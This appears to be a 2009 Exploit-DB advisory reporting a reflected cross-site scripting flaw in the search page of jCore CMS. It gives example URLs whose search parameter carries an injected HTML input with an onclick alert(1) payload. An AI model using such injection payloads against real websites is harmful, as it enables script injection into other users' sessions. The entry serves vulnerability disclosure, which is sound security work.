jCore CMS Cross Site Scripting Vulnerability
| EDB-ID: 10531 | CVE: N/A | OSVDB-ID: 61146 |
| Author: loneferret | Published: 2009-12-17 | Verified:  |
Exploit Code:  |
Vulnerable App: N/A |
Rating |
| EDB-ID: 10531 | CVE: N/A | OSVDB-ID: 61146 |
| Author: loneferret | Published: 2009-12-17 | Verified: |
| Exploit Code: |
Vulnerable App: N/A |
Rating |
Found: loneferret Vendor: jCore Site: http://www.jcore.net/home Software link: http://www.jcore.net/downloads Search page is vulnerable to cross-site scripting. Exploit: http://server/modules/search?search=[xss here] http://server/modules/search?search=</a>[xss here] Example: The result page will screw up. Hit the back button and you newly created submit input type will be there. Fully functional. http://server/modules/search?search=</a><input value="xss" onclick="alert(1)" type="submit">